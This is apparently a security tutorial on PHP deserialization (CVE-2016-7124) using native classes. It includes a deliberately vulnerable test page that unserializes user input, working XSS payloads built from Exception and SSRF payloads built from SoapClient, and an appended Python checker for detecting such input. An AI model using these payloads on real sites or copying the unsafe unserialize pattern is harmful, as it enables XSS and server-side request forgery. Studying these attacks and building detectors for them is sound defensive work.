CVE-2016-7124

    Bypassing __wakeup

    Native classes:

    Native classes in PHP

    <?php
    // Enumerate every class loaded in this PHP build and print the ones that
    // implement a magic method reachable from a deserialized object
    $classes = get_declared_classes();
    foreach ($classes as $class) {
        $methods = get_class_methods($class);
        foreach ($methods as $method) {
            if (in_array($method, array(
                '__destruct',
                '__toString',
                '__wakeup',
                '__call',
                '__callStatic',
                '__get',
                '__set',
                '__isset',
                '__unset',
                '__invoke',
                '__set_state'
            ))) {
                print $class . '::' . $method . "\n";
            }
        }
    }

    Test:

    <?php
    highlight_file(__FILE__);
    $a = unserialize($_GET['k']);   // user-controlled input reaches unserialize()
    echo $a;                        // echoing the object invokes its __toString()
    ?>

    PoC:

    <?php
    // The native Exception class carries a __toString() that includes the message
    $a = new Exception("<script>alert('xiaodi')</script>");
    echo urlencode(serialize($a));
    ?>

    - Echoing the object invokes __toString
    - No application code is needed; the native Exception class is used
    - Look up how Exception is used to write the exploit
    - Visiting the page triggers the output and produces an XSS

    SoapClient native class:

    First test SoapClient under normal conditions: calling a method that does not exist invokes __call.

    SSRF:

    <?php
    // Non-WSDL mode: 'uri' and 'location' are required; 'location' is where the SOAP request is sent
    $a = new SoapClient(null, array('uri' => 'http://example.com:5555', 'location' => 'http://example.com:5555/aaa'));
    $b = serialize($a);
    echo $b;
    $c = unserialize($b);
    $c->a();   // undefined method: __call() issues the HTTP request to 'location'
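An added example from the defensive side, not part of the original notes: a small Python checker that walks a PHP-serialized string before it reaches unserialize(), flagging the native classes discussed above (Exception, SoapClient) and the property-count mismatch that CVE-2016-7124 abuses to skip __wakeup. The WATCHED_CLASSES set and the finding tuple layout are this example's own choices.

```python
import re

# Native classes named on this page whose magic methods a deserialized object can
# reach (Exception::__toString, SoapClient::__call). The set is an assumption for
# this example; extend it to the classes your application should never unserialize.
WATCHED_CLASSES = {"Exception", "SoapClient"}
OBJ_HEADER = re.compile(r'O:(\d+):"([^"]*)":(\d+):\{')


def _parse(data, i):
    """Walk one serialized value starting at data[i]; return (findings, index after it)."""
    findings, tag = [], data[i]
    if tag == "N":                                   # N;
        return findings, i + 2
    if tag in "ibd":                                 # i:42;  b:1;  d:0.5;
        return findings, data.index(";", i) + 1
    if tag == "s":                                   # s:3:"abc";  (length is in bytes)
        len_end = data.index(":", i + 2)
        return findings, len_end + int(data[i + 2:len_end]) + 4
    if tag == "a":                                   # a:<count>:{key;value;...}
        cnt_end = data.index(":", i + 2)
        cls, declared, j = None, int(data[i + 2:cnt_end]), cnt_end + 2
    elif tag == "O":                                 # O:<len>:"<class>":<count>:{...}
        m = OBJ_HEADER.match(data, i)
        if not m:
            raise ValueError(f"bad object header at offset {i}")
        cls, declared, j = m.group(2), int(m.group(3)), m.end()
    else:                                            # C:, r:, R: are not handled here
        raise ValueError(f"unsupported type tag {tag!r} at offset {i}")
    actual = 0
    while data[j] != "}":
        for _ in ("key", "value"):
            sub, j = _parse(data, j)
            findings += sub
        actual += 1
    if cls is not None:
        if cls in WATCHED_CLASSES:
            findings.append(("watched_class", cls, declared, actual))
        if declared != actual:                       # CVE-2016-7124 shape: affected PHP skips __wakeup
            findings.append(("count_mismatch", cls, declared, actual))
    return findings, j + 1


def scan_php_serialized(payload: str) -> list:
    """Return (kind, class, declared_count, actual_count) findings for a serialized blob."""
    data = payload.encode("utf-8").decode("latin-1")  # one char per byte, as PHP counts lengths
    try:
        return _parse(data, 0)[0]
    except (ValueError, IndexError) as exc:
        return [("malformed", str(exc), 0, 0)]
```

Any non-empty result is a reason to reject the input; in production the safer default is unserialize($data, ['allowed_classes' => false]) or a non-PHP format such as JSON.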